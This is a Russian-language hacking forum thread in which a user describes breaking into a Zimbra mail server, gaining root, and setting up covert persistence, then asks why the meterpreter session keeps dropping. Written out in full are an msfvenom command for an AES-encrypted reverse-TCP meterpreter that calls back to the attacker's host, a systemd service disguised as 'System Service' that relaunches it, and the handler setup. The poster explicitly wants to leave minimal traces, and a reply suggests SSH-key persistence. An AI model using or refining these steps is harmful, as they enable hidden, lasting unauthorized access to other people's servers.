• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

meterpreter не переподключается

ilqar200

Member
12.07.2020
9
0
BIT
0
Здравствуйте.Возник такая проблема с meterpreter Опишу ситуацию :
Тестирую некую сеть . В одном из машин нашел уязвимый почтовый сервер Zimbra.Уязвимая машина стоит за nat/firewall а у меня машина стоит за роутером. Использовав эксплоит я сделал backconnect к своей машине с помощью nc. Успешно подключился. После этого получил привилегии root. Но для чтобы тестировать сеть мне нужно на этой взломанной машине закрепиться.Для этой цели я сделал следующее : Я сгенерировал payload в metasploit с помощью команды :
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=мой внешний ip LPORT=46852 --encrypt aes256 --encrypt-key encryptkey -f elf > /root/Desktop/system
И после этого загрузил этот payload на машину.Положил payload в папку /usr/bin/ . Создал свой системный сервис с запуском payload-а каждые пят минут проделав следующее :
1)Создал файл system.service в директории /etc/systemd/system/ с таким содержанием :
[Unit]
Description=System Service
[Service]
ExecStart=/usr/bin/system
Restart=always
RestartSec=300
[Install]
WantedBy=default.target
2) Набрал следующее в терминале :
systemctl enable system.service
systemctl start system.service
Набрав systemctl --list=service и увидел что мой сервис успешно стартанул. После этого я оборвал соединение с nc. Набрал в Metasploit следующее :

use exploit/multi/handler
set payload payload/linux/x64/meterpreter_reverse_tcp
set lhost мой внутренний ip (192.168.0.102 в Kali)
set lport 46852
set ReverseListenerBindAddress 192.168.0.102
run
Мой payload успешно подключился к моей машине.Но после некоторой работы на уязвимой машине или некоторого времени связь обрывается и сообщение : Meterpreter session died.Это происходит редко но все таки происходить. Ну я в этом случае открываю прослушку заново с параметрами выше при этом перезапустив и metasploit заново. На этот раз сообщение : Meterpreter session is not valid session and will closed.
OC уязвимый машины :CentOS 7.9.2009 (Linux 3.10.0-1160.6.1.el7.x86_64)
Так вот. Вопросы :
1) Почему обрывается связь ? Я посмотрел в опциях meterpreter там стоит SessionExpirationTimeout с значением 604800 . Из-за чего может произойти обрыв ?
2) Почему появляется ошибка "Meterpreter session is not valid session and will closed. " и сессия не устанавливаеться ? Что я сделал неправильно ?
Интересно мне вот что : После ошибки "Meterpreter session is not valid session and will closed. " я заново эксплуатирую ошибку в zimbra ,повышаю права , убиваю процесс payload-a. И после этого payload успешно подключаеться к моей машине.
Что нужно сделать в данной ситуации ? Спасибо за ответы.
 

GoBL1n

Grey Team
04.08.2016
497
130
BIT
139
Каким способом можно еще закрепиться ?
я тут буквально вчера читал, самый простой способ закрепится на Уникс машине, поднять ssh, сгенерировать ключь, поправить настройки чтоб без пароля по ключу, и вот тебе закреп :))
 

ilqar200

Member
12.07.2020
9
0
BIT
0
я тут буквально вчера читал, самый простой способ закрепится на Уникс машине, поднять ssh, сгенерировать ключь, поправить настройки чтоб без пароля по ключу, и вот тебе закреп :))
С помощью этого способа следов будет больше в системе по моему . Мне нужно закрепиться по минимуму следов. Meterpreter оставляет менее следов по моему . Но не пойму почему не переподключается . Ест какие то другие способы закрепиться по минимуму следов ?
 
Последнее редактирование:

ilqar200

Member
12.07.2020
9
0
BIT
0
Мне надо чтобы процесс payload-a завершился автоматом если нету подключений к моей машине . После этого системный сервис который я создал перезапустит процесс payload-a. Как сделать чтобы процесс payload-a завершился автоматически если нету активных подключений ? Я так понимаю мне нужно сгенерировать заново payload с измененными параметрами и загрузить новый payload на уязвимую машину . Какие параметры нужно изменить чтобы процесс payload-a завершился автоматом если нету активных подключений ?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!